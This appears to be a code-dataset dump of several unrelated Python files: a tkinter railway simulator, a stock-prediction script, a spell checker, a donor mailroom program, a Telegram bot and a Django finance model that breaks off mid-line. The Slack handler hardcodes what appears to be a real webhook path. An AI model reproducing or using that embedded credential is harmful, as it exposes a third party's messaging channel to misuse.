text=\"\", borderwidth=0, width=10)\n label.grid(row=row, column=column, sticky=\"nsew\", padx=1, pady=1)\n current_row.append(label)\n self._widgets.append(current_row)\n for column in range(columns):\n self.grid_columnconfigure(column, weight=1)\n def set(self, row, column, value):\n widget = self._widgets[row][column]\n widget.configure(text=value)\n \n def fill(self):\n r = 1\n for train in trainl:\n self.set(r, 0, train.code)\n self.set(r, 1, train.name)\n self.set(r, 2, train.arrival)\n self.set(r, 3, train.departure)\n self.set(r, 4, train.platform)\n r+=1\n\n def update(self):\n i = 0\n while i=45:\n hour = str((int(hour)+1)%24)\n mint=str((int(mint)+15)%60)\n else:\n if int(mint)>=55:\n hour = str((int(hour)+1)%24)\n mint=str((int(mint)+5)%60)\n if len(hour)<2:\n hour = '0'+hour\n if len(mint)<2:\n mint = '0'+mint\n return hour+':'+mint\n\n\ndef simulate():\n global startstate\n data()\n for t in pltrains:\n if timecnt>=t.departure:\n t.vel = 2\n t.platform = 0\n t.status = \"departed\"\n del pltrains[pltrains.index(t)]\n # remove this train from schedule table\n\n for t in outertrains:\n flag = 0\n for p in platforml:\n if not p.occupied and p.status:\n flag = 1\n outer = t.outerline\n t.vel = 2\n t.platform = p.platformNo\n t.status = \"arrived\"\n p.occupied = True\n p.train = t\n del outertrains[outertrains.index(t)]\n pltrains.append(t)\n for ol in outerl:\n if ol.train==t:\n ol.train = None\n ol.occupied = False\n break\n break\n if flag==0:\n break\n\n for t in waitingtrains:\n flag = 0\n for p in platforml:\n if not p.occupied and p.status:\n flag = 1\n t.vel = 2\n t.platform = p.platformNo\n t.status = \"arrived\"\n p.occupied = True\n p.train = t\n del waitingtrains[waitingtrains.index(t)]\n pltrains.append(t)\n for ol in outerl:\n if ol.train==t:\n ol.train = None\n ol.occupied = False\n break\n break\n if flag==0:\n break\n\n for t in trainl:\n if(t.x<400):\n t.update(app.w)\n for o in outerl:\n o.update(app.w)\n\n if startstate:\n master.after(10, simulate)\n\ndef counter_label(label):\n def count():\n global counter, startstate, timecnt\n counter += 1\n timecnt = time.strftime(\"%H:%M\", time.gmtime(counter))\n label.config(text=\"Timer: \"+time.strftime(\"%H:%M\", time.gmtime(counter)))\n if(startstate):\n label.after(fps, count)\n count()\n\ndef data():\n #Label(frame,text=\"Train Code \"+\"Train Name \"+ \"Arrival Time \"+\"Departure Time \"+\"Arrival Platform Number \").grid(row=0,column=1)\n Label(frame).grid(row=0,column=0,padx=100)\n Label(frame,text=\"Train Code\",font = \"Helvetica 14 bold\").grid(row=0,column=4,padx=30)\n Label(frame,text=\"Train Name\",font = \"Helvetica 14 bold\").grid(row=0,column=8,padx=30)\n Label(frame,text=\"Arrival Time\",font = \"Helvetica 14 bold\").grid(row=0,column=12,padx=30)\n Label(frame,text=\"Departure Time\",font = \"Helvetica 14 bold\").grid(row=0,column=16,padx=30)\n Label(frame,text=\"Platform Number\",font = \"Helvetica 14 bold\").grid(row=0,column=20,padx=30)\n i = 0\n for trains in trainl:\n Label(frame,text=trains.code,font = \"Helvetica 10\").grid(row=i+1,column=4)\n Label(frame,text=trains.name,font = \"Helvetica 10\").grid(row=i+1,column=8)\n Label(frame,text=trains.arrival,font = \"Helvetica 10\").grid(row=i+1,column=12)\n Label(frame,text=trains.departure,font = \"Helvetica 10\").grid(row=i+1,column=16)\n Label(frame,text=trains.platform,font = \"Helvetica 10\").grid(row=i+1,column=20)\n i = i+1\n\ndef myfunction(event):\n canvas.configure(scrollregion=canvas.bbox(\"all\"),width=master.winfo_screenwidth()-100,height=200)\n\nmaster = Tk()\n\nposx = 0\nposy = 0\nscreenWidth = master.winfo_screenwidth()\nscreenHeight = master.winfo_screenheight()\nmaster.wm_geometry(\"%dx%d+%d+%d\" % (screenWidth, screenHeight, posx, posy))\n\nLabel(master, text=\"Welcome To NDLS Railway Station\",fg = \"black\",font = \"Helvetica 18 bold\").pack()\ntimer = Label(master, fg=\"black\", font = \"Helvetica 18 bold\")\ntimer.pack()\napp = App(master)\n\n# All things realted to train time table\nmyframe=Frame(master,relief=GROOVE,width=50,height=100,bd=1)\nmyframe.place(x=10,y=master.winfo_screenheight()-230)\n\ncanvas=Canvas(myframe)\nframe=Frame(canvas)\nmyscrollbar=Scrollbar(myframe,orient=\"vertical\",command=canvas.yview)\ncanvas.configure(yscrollcommand=myscrollbar.set)\n\nmyscrollbar.pack(side=\"right\",fill=\"y\")\ncanvas.pack(side=\"left\")\ncanvas.create_window((0,0),window=frame,anchor='nw')\nframe.bind(\"\",myfunction)\ndata()\n# things related to train timetable over\n\nschedule()\nmaster.mainloop()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"268344450","text":"import pandas as pd\nimport numpy as np\nimport talib as ta\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom datetime import datetime\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import StandardScaler\n\nimport os\nfrom Alpha_vantage_pricing import get_daily\nfrom Alpha_vantage_pricing import get_intraday\n\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 500)\n\ntickers = ['AAPL', 'UAA', 'EA', 'AMD', 'BLK', 'BA', 'CBRE', 'KO', 'GE', 'ECL', 'GS', 'KR', 'MRK']\nfor tick in tickers:\n df = pd.DataFrame(get_daily(tick,'full'))\n df.index = pd.to_datetime(df.timestamp)\n df = df.drop('timestamp', axis =1)\n df = df[::-1]\n\n df['sma_5']= pd.Series(df['close']).rolling(5).mean()\n df['sma_10']= pd.Series(df['close']).rolling(10).mean()\n df['sma_20']= pd.Series(df['close']).rolling(20).mean()\n df['MOM_5'] = ta.MOM(df.close.values, timeperiod=5)\n df['MOM_10'] = ta.MOM(df.close.values, timeperiod=10)\n df['EMA5'] = ta.EMA(df.close.values, timeperiod=5)\n df['EMA10'] = ta.EMA(df.close.values, timeperiod=10)\n df['EMA20'] = ta.EMA(df.close.values, timeperiod=20)\n df['EMA60'] = ta.EMA(df.close.values, timeperiod=60)\n #start adding indicators\n df['ROC'] = ta.ROC(df['close'].values, timeperiod=10)\n df['ROCP'] = ta.ROCP(df['close'].values, timeperiod=10)\n\n df['macd1'], df['macdSignal1'], df['macdHist1'] = ta.MACD(df['close'].values, fastperiod=12, slowperiod=26, signalperiod=9)\n df['SAR']= ta.SAR((df['high'].values), (df['low'].values), acceleration = 0.02, maximum = 0.2)\n df['slowk'], df['slowd'] = ta.STOCH((df['high'].values), (df['low'].values), (df['close'].values)\n ,fastk_period=5, slowk_period=3, slowk_matype=0, slowd_period=3, slowd_matype=0)\n df['fastk'], df['fastd'] = ta.STOCHF((df['high'].values), (df['low'].values), (df['close'].values)\n , fastk_period=5, fastd_period=3, fastd_matype=0)\n df['RSI'] = ta.RSI(df.close.values, timeperiod=14)\n df['Williams'] = ta.WILLR(df.high.values, df.low.values, df.close.values, timeperiod=14)\n df['MFI'] = ta.MFI(df.high.values, df.low.values, df.close.values, df.volume.values.astype(float), timeperiod=12)\n df['NAT'] = ta.NATR(df.high.values, df.low.values, df.close.values, timeperiod=12)\n df['TRIX'] = ta.TRIX(df.close.values, timeperiod=30)\n df['PLUS_DI'] = ta.PLUS_DI(df.high.values, df.low.values, df.close.values, timeperiod=12)\n df['MINUS_DI'] = ta.MINUS_DI(df.high.values, df.low.values, df.close.values, timeperiod=12)\n df['BOP'] = ta.BOP(df.open.values, df.high.values, df.low.values, df.close.values)\n df['ADX'] = ta.ADX(df.high.values, df.low.values, df.close.values, timeperiod=12)\n df['TRANGE']= ta.TRANGE(df.high.values, df.low.values, df.close.values)\n df['OBV'] = ta.OBV(df.close.values, df.volume.values.astype(float))\n df['ADOSC'] = ta.ADOSC(df.high.values, df.low.values, df.close.values, df.volume.values.astype(float), fastperiod=3, slowperiod=10)\n df['CRTDR'] = (df.close.values - df.low.values) / (df.high.values - df.low.values)\n df['ATR'] = ta.ATR(df.high.values, df.low.values, df.close.values, timeperiod=12)\n\n #look at returns compared to x days back (pos shift to go back x days)\n df['1day_returns'] = np.log(df.close/df.close.shift(1))\n df['5day_returns'] = np.log(df.close/df.close.shift(5))\n df['10day_returns'] = np.log(df.close/df.close.shift(10))\n df['20day_returns'] = np.log(df.close/df.close.shift(20))\n df['60day_returns'] = np.log(df.close/df.close.shift(60))\n\n #Signals if price goes up or down in future (negative shift to go to future)\n df['1day_Signal'] = 0\n df['5day_Signal'] = 0\n df['10day_Signal'] = 0\n df['20day_Signal'] = 0\n df['60day_Signal'] = 0\n\n df['1day_Signal'][df['1day_returns'].shift(-1) > 0] = 1\n df['1day_Signal'][df['1day_returns'].shift(-1) < 0] = -1\n df['5day_Signal'][df['5day_returns'].shift(-5) > 0] = 1\n df['5day_Signal'][df['5day_returns'].shift(-5) < 0] = -1\n df['10day_Signal'][df['10day_returns'].shift(-10) > 0] = 1\n df['10day_Signal'][df['10day_returns'].shift(-10) < 0] = -1\n df['20day_Signal'][df['20day_returns'].shift(-20) > 0] = 1\n df['20day_Signal'][df['20day_returns'].shift(-20) < 0] = -1\n df['60day_Signal'][df['60day_returns'].shift(-60) > 0] = 1\n df['60day_Signal'][df['60day_returns'].shift(-60) < 0] = -1\n\n\n #plot market returns - only for the plot not\n df['mkt_returns1'] = df['1day_returns'] #.expanding().sum()\n df['mkt_returns5'] = df['5day_returns'] #.expanding().sum()\n df['mkt_returns10'] = df['10day_returns'] #.expanding().sum()\n df['mkt_returns20'] = df['20day_returns'] #.expanding().sum()\n df['mkt_returns60'] = df['60day_returns'] #.expanding().sum()\n\n #Confirm by looking at \" perfect strategy returns\" i.e. buy if price will go up in future\n #for today, get signal from 60 days ago and mult by todays 60 day ret\n df['str_returns1'] = df['1day_Signal'].shift(1)* df['1day_returns']\n df['str_returns5'] = df['5day_Signal'].shift(5)* df['5day_returns']\n df['str_returns10'] = df['10day_Signal'].shift(10)* df['10day_returns']\n df['str_returns20'] = df['20day_Signal'].shift(20)* df['20day_returns']\n df['str_returns60'] = df['60day_Signal'].shift(60)* df['60day_returns']\n Periods = ['1','5','10','20','60']\n for PER in Periods:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(df['str_returns'+str(PER)].iloc[::int(PER)].expanding().sum(), color='r', label=str(PER)+\" day Perfect Strategy Returns\")\n ax.plot(df['mkt_returns'+str(PER)].iloc[::int(PER)].expanding().sum(), color='b', label=str(PER)+\" day Market Returns\")\n plt.legend(loc='best')\n plt.title(\"Returns for Perfect Trading at the Close\")\n plt.show()\n df.replace(-0,0)\n data = df.astype(float)\n\n####NEED TO CONTINUE TO SPLIT OUT DATA INTO DIFF TIME PERIODS _ PREV WAS PREDICTING 60 day return one day out i.e today day 59 and predict day 60 returns\n SIGNAL = ['60', '20', '10', '5', '1']\n for Sig in SIGNAL:\n data = df.astype(float) #these vars are good bc we based the signal decision on the next day returns i.e. shift forward is implemented\n data = data[[str(Sig)+'day_Signal','open', 'high', 'low', 'close', 'volume', 'sma_5', 'sma_10', 'sma_20', 'MOM_5', 'MOM_10', 'EMA5', 'EMA10', 'EMA20', 'EMA60', 'macd1', 'macdSignal1', 'macdHist1', 'SAR', 'slowk', 'slowd', 'fastk', 'fastd', 'RSI', 'Williams', 'MFI', 'NAT', 'TRIX', 'PLUS_DI', 'MINUS_DI', 'BOP', 'ADX', 'TRANGE', 'OBV', 'ADOSC', 'CRTDR', 'ATR', '1day_returns', '5day_returns', '10day_returns', '20day_returns', '60day_returns']]\n data[str(Sig)+'day_Signal'][data[str(Sig)+'day_Signal'] == 1] = 'BUY'\n data[str(Sig)+'day_Signal'][data[str(Sig)+'day_Signal'] == -1] = 'SELL'\n data[str(Sig)+'day_Signal'][data[str(Sig)+'day_Signal'] == 0] = 'NA'\n data = data.dropna()\n X, y = data.iloc[:, 1:], data[str(Sig)+'day_Signal']\n X_train, X_test = X[X.index < '2017-01-01'], X[X.index >= '2017-01-01']\n y_train, y_test = y[y.index < '2017-01-01'], y[y.index >= '2017-01-01']\n scaler = StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n #y_test = np.log(y_test) gives shitty results\n #y_train = np.log(y_train)\n '''scalery = StandardScaler().fit(np.array(y_train).reshape(-1, 1))\n y_test = scalery.transform(np.array(y_test).reshape(-1, 1))\n y_train = scalery.transform(np.array(y_train).reshape(-1, 1))'''\n print(str(Sig)+'Signal')\n print(tick)\n model = RandomForestClassifier(n_estimators=1000, max_depth=5, max_features='sqrt', random_state=42)\n print(model)\n model.fit(X_train, y_train)\n model.score(X_test, y_test)\n y_pred = model.predict(X_test)\n print(classification_report(y_test, y_pred))\n print(confusion_matrix(y_test,y_pred))\n #get the returns of the model\n y_pred[y_pred == 'BUY'] = 1\n y_pred[y_pred == 'SELL'] = -1\n y_pred[y_pred == 'NA'] = 0\n strat_returns = pd.Series(y_pred).shift(int(Sig))* X[str(Sig)+'day_returns'][X.index >= '2017-01-01'].values\n #get the returns of the perfect strategy\n y_test[y_test == 'BUY'] = 1\n y_test[y_test == 'SELL'] = -1\n y_test[y_test == 'NA'] = 0\n perf_returns = pd.Series(pd.Series(y_test).shift(int(Sig))* X[str(Sig)+'day_returns'][X.index >= '2017-01-01'].values).reset_index(drop=True)\n #returns of the market\n mkt_returns = pd.Series(X[str(Sig)+'day_returns'][X.index >= '2017-01-01'].values).reset_index(drop=True)\n #plot the result\n fig = plt.figure()\n ax = fig.add_subplot(111) #grabbing every nth row of returns to get the cum sum is what allows us mutiply to get 5 day returns every day\n ax.plot(perf_returns.iloc[::int(Sig)].expanding().sum(), color='b', label='Test '+str(Sig)+'day_Signal Perfect Strategy Returns') #need to only sum every 5th term..\n ax.plot(mkt_returns.iloc[::int(Sig)].expanding().sum(), color='r', label='Test'+str(Sig)+'day_Signal Market Returns')\n ax.plot(strat_returns.iloc[::int(Sig)].expanding().sum(), color='g', label='Test '+str(Sig)+'day_Signal Strategy Returns')\n plt.legend(loc='best')\n plt.title(\"Algo Test Returns\")\n plt.show()\n#save plots to compare - market return levels should be same but smoothed - ie. same max; strat and perf should ideally increase bc more trades to take advantage of more gains\n#if doing application - can only make decision to buy/sell every 5 days.\n#maybe pull in minute data in addition to daily ---> or what is better might be to take into account cost and model with hold, strong/weak/buy/sell\n\n'''\nprint(\"Gbooster:\") #..36; cv gives 56 #terrible when scaled\nfrom sklearn.ensemble import GradientBoostingClassifier\nmodel= GradientBoostingClassifier()\nmodel.fit(X_train, y_train)\nmodel.score(X_test,y_test)\ny_pred = model.predict(X_test)\nprint('MSE')\nprint(mean_squared_error(y_test, y_pred))\nprint(\"MAE\")\nprint(mean_absolute_error(y_test, y_pred))\nprint(\"R^2\")\nprint(r2_score(y_test, y_pred))\n\nfrom sklearn.ensemble import RandomForestClassifier #good when all vars are scaled\nmodel = RandomForestClassifier(n_estimators=100, random_state=42)\nmodel.fit(X_train, y_train)\nmodel.score(X_test,y_test)\ny_pred = model.predict(X_test)\nprint(classification_report(y_test, y_pred))\n\nprint('MSE')\nprint(mean_squared_error(y_test, y_pred))\nprint(\"MAE\")\nprint(mean_absolute_error(y_test, y_pred))\nprint(\"R^2\")\nprint(r2_score(y_test, y_pred))\n\nprint(\"ExtraTrees:\") #25\nfrom sklearn.ensemble import ExtraTreesClassifier\nmodel = ExtraTreesClassifier(random_state=42)\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nprint('MSE')\nprint(mean_squared_error(y_test, y_pred))\nprint(\"MAE\")\nprint(mean_absolute_error(y_test, y_pred))\nprint(\"R^2\")\nprint(r2_score(y_test, y_pred))\n\n\nmodel = Sequential()\nmodel.add(Dense(128, input_dim=X_test.shape[1] ,init='uniform'))\nmodel.add(Dense(64, init='uniform',activation='relu'))\nmodel.add(Dense(8, init='uniform',activation='relu'))\nmodel.add(Dense(1, init='uniform',activation='sigmoid'))\nprint(model.summary())\n\nmodel.compile(loss='mean_squared_error',optimizer='adam',metrics=['mae','mse','mape'])\nnnet = model.fit(X_train,y_train, epochs = 100, batch_size=10)\nscores = model.evaluate(X_test, y_test)\nprint(\"\\n%s: %.2f\" % (model.metrics_names[1],scores[1]))\nprint(\"\\n%s: %.2f\" % (model.metrics_names[2],scores[2]))\nprint(\"\\n%s: %.2f%%\" % (model.metrics_names[3],scores[3]*100))\n\nfrom sklearn.neural_network import MLPClassifier\nprint(\"NNET:\")\nmodel = MLPClassifier(alpha=.00001,max_iter=5000) #57; cv .01\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nprint('MSE')\nprint(mean_squared_error(y_test, y_pred))\nprint(\"MAE\")\nprint(mean_absolute_error(y_test, y_pred))\nprint(\"R^2\")\nprint(r2_score(y_test, y_pred))\n'''","sub_path":"Blake_Algo.py","file_name":"Blake_Algo.py","file_ext":"py","file_size_in_byte":12255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"408987133","text":"# -*- coding:utf-8 -*-\nimport urllib2\nimport enchant\nimport optparse\n\nfrom enchant.tokenize import get_tokenizer\nfrom enchant.tokenize import HTMLChunker\n\n__metaclass__ = type\n\nclass HTMLSpellChecker:\n def __init__(self, lang='en_US'):\n \"\"\"\n Setup tokenizer.\n\n Create a new tokenizer baesd on lang.\n This let's us skip the HTML and only\n care about our contents.\n \"\"\"\n self.lang = lang\n self._dict = enchant.Dict(self.lang)\n self._tk = get_tokenizer(self.lang,\n chunkers=(HTMLChunker,))\n\n def __call__(self, line):\n for word,off in self._tk(line):\n if not self._dict.check(word):\n yield word, self._dict.suggest(word)\n\nif __name__ == '__main__':\n parser = optparse.OptionParser()\n parser.add_option('-u', '--url', help=\"URL to Check\")\n opts, args = parser.parse_args()\n\n if not opts.url:\n parser.error(\"URL is required\")\n\n check = HTMLSpellChecker()\n for line in urllib2.urlopen(opts.url):\n lineno = 0\n for word,suggestions in check(line):\n lineno += 1\n print(\"error on line %d (%s) on page %s. Did you mean:\\n\\t%s\" % \\\n (lineno, word, opts.url, ', '.join(suggestions)))\n","sub_path":"algorithm_python/forreal/logparser/html_spelling_check.py","file_name":"html_spelling_check.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"21900376","text":"import os\ndonors = []\n\n\ndef menu():\n global donors\n os.system('clear')\n choice = input(\"\\n\\\nChoose from the following: \\n\\\nT - Send a (T)hank you \\n\\\nR - Create a (R)eport \\n\\\nquit - Quit the program \\n\\\n> \")\n if(choice == 'T' or choice == 't'):\n thank_you_name()\n elif(choice == 'R' or choice == 'r'):\n create_report()\n elif(choice == 'quit'):\n quit()\n\n\ndef thank_you_name():\n \"\"\"Executed when 'T' is used in the menu function.\n This function prompts user for a name in which user can provide\n quit command to go back to the main menu, list all the donors, or\n a name to send a thank you letter. When a name is entered it will\n ask for donation and prints a letter.\"\"\"\n global donors\n while True:\n os.system('clear')\n name = input(u\"\\n\\\nPlease enter a name or choose from the following: \\n\\\nlist - Print a list of previous donors\\n\\\nquit - Return to main menu \\n\\\n> \")\n if(name == 'quit'):\n return\n # If name is 'list' loop does not break nor return\n # to the main menu\n elif(name == 'list'):\n os.system('clear')\n print(\"List of Names\")\n print(\"-------------\")\n sorted_name = sort_by_name()\n for donor in sorted_name:\n print(donor[0])\n input(u\"\\nPress enter to continue...\")\n elif(name.replace(' ', '').isalpha()):\n break\n # If the loop breaks, name is neither 'quit' or 'list'\n name = name.title()\n # Uses name to check for contain boolean and uses it with index\n contains_and_index = contains_index(name)\n contains, index = contains_and_index[0], contains_and_index[1]\n if(not contains):\n donors.append([name, 0, 0])\n # Add donation\n donation = add_donation(index)\n if(donation == 'quit'):\n return\n # Print a letter\n create_a_letter(name, donation)\n\n\ndef add_donation(index):\n \"\"\"\n This function adds donation to the donor list\n \"\"\"\n os.system('clear')\n global donors\n while True:\n amount = input(u\"\\nPlease enter the donation amount or 'quit': \")\n if(amount == 'quit'):\n return amount\n elif(is_number(amount)):\n # amount is rounded to 2 decimal place\n amount = float(\"{0:.2f}\".format(float(amount)))\n donors[index][1] += amount\n donors[index][2] += 1\n return amount\n\n\ndef create_a_letter(name, donation):\n \"\"\"\n This function prints a \"Thank you\" letter\n \"\"\"\n os.system('clear')\n print(u\"\\n\\\nDear %s, \\n\\\n\\n\\\n Thank you so much for your kind donation of $%.2f. We here at the\\n\\\nFoundation for Everyone Needs Potato Salad greatly appreciate it. You \\n\\\nmoney will go towards researching the best way for everyone in the world\\n\\\nto enjoy potato salad.\\n\\\n\\n\\\nThanks again,\\n\\\n\\n\\\nChong Park\\n\\\n\\n\\\nDirector, Foundation for Everyone Needs Potato Salad\\n\\n\\n\" % (name, donation))\n # Exception check for quitting after printing the letter\n # This was added to pass the test_mailroom.py\n exception = input(\"Press Enter to continue....\")\n if(exception == 'quit'):\n quit()\n\n\ndef contains_index(name):\n \"\"\"\n Returns True, and index, if name is contained in the donors list.\n Returns False, and last index if name is not contained in the donors list\n \"\"\"\n global donors\n contains = False\n index = 0\n for donor in donors:\n if(donor[0] == name):\n contains = True\n break\n index += 1\n print([contains, index])\n return [contains, index]\n\n\ndef create_report():\n \"\"\"\n Executed when R is pressed in the main menu.\n It creates a report in table format.\n Items on the columns are joined by tabs to create a tabular\n table. The tab-ing is determined by the length of variable in the\n column.\n Format follows:\n Name |Total |# |Average Donation\n -----------------------------------------------------------\n 1234567890123456|1234567890123456|12345678|12345....\n Example Name |1000.00 |2 |500.00\n where number is how many spaces are in each column\n \"\"\"\n os.system('clear')\n global donors\n # Using variable tab and tab2 as tabs for spacing\n tab = \"\\t|\"\n tab2 = \"\\t\\t|\"\n s_l = sort_by_donation()\n # newlist will hold the string values for each row of donor information\n newlist = []\n for x in s_l:\n # avg is calculated by total donation / # of donation\n # it will get float with 2 decimal values\n avg = '%.2f' % (float(x[1]) / x[2])\n # row holds list of each items of donor info.\n # row = [name, total, # donation, avg]\n row = [x[0], '%.2f' % x[1], str(x[2]), str(avg)]\n # Below is tabbing for correct tab space depends on length of the name\n # or donation amount. Max char per name and total donation\n # is 16. It will only account for that much tabbing at the moment\n if(len(row[0]) > 7):\n r_i = [(tab).join(row[:2]), (tab).join(row[2:])]\n else:\n r_i = [(tab2).join(row[:2]), (tab).join(row[2:])]\n if(len(row[1]) >= 7):\n row_items = (tab).join(r_i)\n else:\n row_items = (tab2).join(r_i)\n newlist.append(row_items)\n\n col = [\"Name\", \"Total\", \"#\", \"Average Donation\"]\n subtopic = [(tab2).join(col[:2]), (tab).join(col[2:])]\n columns = (tab2).join(subtopic)\n print(columns)\n print(\"-----------------------------------------------------------\")\n for items in newlist:\n print(items)\n print(\"\\n\\n\\n\")\n # Exception check for quitting after printing the letter\n # This was added to pass the test_mailroom.py\n exception = input(\"Press Enter to continue....\")\n if(exception == 'quit'):\n quit()\n\n\ndef sort_by_donation():\n \"\"\"\n Sorts donors list to a new list in order of most to least donation\n This sorting algorithm uses insertion method.\n \"\"\"\n global donors\n # s_l is short hand for sorted_list\n # d is short hand for single donor in donors\n # s_i is short hand for sorted index\n s_l = []\n for d in donors:\n # d is short hand for sorted_list\n if(len(s_l) == 0):\n sorted_i = 0\n else:\n # current d's total donation is greater than the 1st value in\n # sorted_list's total donation\n if(d[1] >= s_l[0][1]):\n sorted_i = 0\n # current d's total donation is less than the last value in\n # sorted_list's total donation\n elif(d[1] < s_l[-1][1]):\n sorted_i = len(s_l)\n # otherwise, look for index where d's total donation can squeen\n # in between\n else:\n i = 0\n while (i < len(s_l) - 1):\n if(s_l[i][1] <= d[1] and s_l[i + 1][1] > d[1]):\n sorted_i = i + 1\n break\n i += 1\n s_l.insert(sorted_i, d)\n return s_l\n\n\ndef sort_by_name():\n \"\"\"\n Sorts donors list to a new list in alphabetical order of the name\n This sorting algorithm uses insertion method.\n \"\"\"\n # s_l is short hand for sorted_list\n # d is short hand for single donor in donors\n # s_i is short hand for sorted index\n global donors\n s_l = []\n for d in donors:\n if(len(s_l) == 0):\n sorted_i = 0\n else:\n # current d's name is less than the 1st value in\n # sorted_list's name\n if(d[0] < s_l[0][0]):\n sorted_i = 0\n # current d's name is bigger than the last value in\n # sorted_list's name\n elif(d[0] > s_l[-1][0]):\n sorted_i = len(s_l)\n # otherwise, look for index where d's name can squeeze\n # in between\n else:\n i = 0\n while(i < len(s_l) - 1):\n if(s_l[i][0] < d[0] and s_l[i + 1][0] > d[0]):\n sorted_i = i + 1\n break\n i += 1\n s_l.insert(sorted_i, d)\n return s_l\n\n\ndef is_number(n):\n \"\"\"\n Returns true if given string n is a float number\n Ex. If n=\"12.34\" it will return True\n \"\"\"\n try:\n float(n)\n return True\n except ValueError:\n return False\n\nprint(\"Welcome to Mailroom Madness\")\nwhile True:\n menu()\n","sub_path":"hw/hw11/mailroom.py","file_name":"mailroom.py","file_ext":"py","file_size_in_byte":8445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"408451726","text":"import telegram\nfrom flask import Flask, request\nfrom telegram.ext import Dispatcher, MessageHandler, Filters, CommandHandler\nimport os\n\nfrom module_globalVar import globalVar\nglobalVar._init()\n\nfrom module_nlp.snowNLP import *\nfrom module_cmdHandler.cmdHandler import *\n\nTOKEN = os.environ[\"TOKEN\"]\nPORT = int(os.environ.get('PORT', '5000'))\n\nglobalVar.set_value(\"SENTIMENT_ANALYSIS\", True)\n\nbot = telegram.Bot(token=TOKEN)\napp = Flask(__name__)\n\n@app.route('/hook', methods=['POST'])\ndef webhook_handler():\n \"\"\"Set route /hook with POST method will trigger this method.\"\"\"\n if request.method == \"POST\":\n update = telegram.Update.de_json(request.get_json(force=True), bot)\n\n # Update dispatcher process that handler to process this message\n dispatcher.process_update(update)\n return 'ok'\n\ndef reply_handler(bot, update):\n \"\"\"Reply message.\"\"\"\n text = update.message.text\n user_id = update.message.from_user.id\n if globalVar.get_value(\"SENTIMENT_ANALYSIS\", True):\n textSenti = sentimentAnalysis(text)\n if textSenti:\n update.message.reply_text(textSenti)\n else:\n update.message.reply_text(text)\n\n# New a dispatcher for bot\ndispatcher = Dispatcher(bot, None)\n\n# Add handler for handling message, there are many kinds of message. For this handler, it particular handle text\n# message.\ndispatcher.add_handler(CommandHandler(\"sentiment_analysis_start\", sentimentAnalysisStart))\ndispatcher.add_handler(CommandHandler(\"sentiment_analysis_stop\", sentimentAnalysisStop))\ndispatcher.add_handler(CommandHandler(\"murmur\", sendMurmur))\ndispatcher.add_handler(CommandHandler(\"fetch_music\", fetchMusic, pass_args=True))\ndispatcher.add_handler(MessageHandler(Filters.text, reply_handler))\n\nif __name__ == \"__main__\":\n # Running server\n app.run(port = PORT, host='0.0.0.0')","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"507391076","text":"import sys\nimport httplib\nimport json\nimport datetime\n\n\ndef eventHandler(event, context, callback):\n callback[\"result\"] = \"node1\"\n conn = httplib.HTTPSConnection(\"hooks.slack.com\")\n l_dumps_content = \"init node = node1\"\n l_payload_webhook = {\"text\": l_dumps_content}\n params = json.dumps(l_payload_webhook)\n print(params)\n\n conn.request(\n \"POST\", \"/services/T1P5CV091/B1PV8CWHX/NEB7M8Y0A5OO7SctSxntHdZt\", params)\n\n response2 = conn.getresponse()\n print(str(response2))\n","sub_path":"slack1.py","file_name":"slack1.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"309491174","text":"import uuid\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.contrib import admin\nfrom finance.services.atrium_api import AtriumApi\nfrom django.apps import apps\nfrom django.db import transaction\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom web.models import ActiveModel, ActiveManager\n\n\nclass AccountManager(ActiveManager):\n @transaction.atomic\n def create_or_update_accounts(self, user_guid, l):\n \"\"\"\n Input: all user accounts from atrium API.\n\n TODO: pagination.\n Before passing accounts, should collect\n all of them for each user.\n \"\"\"\n for acc in l:\n self.create_or_update_account(acc)\n\n def create_or_update_account(self, api_response):\n \"\"\"\n api_response is dictionary with response result.\n If account is deleted in Donkies (is_active=False), do not process.\n \"\"\"\n Member = apps.get_model('finance', 'Member')\n d = api_response\n d.pop('user_guid')\n d.pop('institution_code')\n d['member'] = Member.objects.get(guid=d.pop('member_guid'))\n\n m_fields = self.model._meta.get_fields()\n m_fields = [f.name for f in m_fields]\n\n d = {k: v for (k, v) in d.items() if k in m_fields}\n\n try:\n acc = self.model.objects.get(guid=d['guid'])\n if not acc.is_active:\n return None\n acc.__dict__.update(d)\n except self.model.DoesNotExist:\n acc = self.model(**d)\n acc.save()\n return acc\n\n def get_atrium_accounts(self, user_guid):\n \"\"\"\n Queries atrium API for user's accounts.\n TODO: processing errors.\n \"\"\"\n per_page = 100\n\n a = AtriumApi()\n res = a.get_accounts(user_guid, records_per_page=per_page)\n return res['accounts']\n\n def get_accounts(self, user_guid):\n \"\"\"\n Returns user accounts from database.\n \"\"\"\n return self.model.objects.active().filter(\n member__user__guid=user_guid)\n\n def debit_accounts(self):\n return self.model.objects.active().filter(type_ds=self.model.DEBIT)\n\n def debt_accounts(self):\n return self.model.objects.active().filter(type_ds=self.model.DEBT)\n\n @transaction.atomic\n def set_funding_source(self, account_id):\n \"\"\"\n Set debit account as funding source for user.\n Account should exist in FundingSource.\n \"\"\"\n FundingSource = 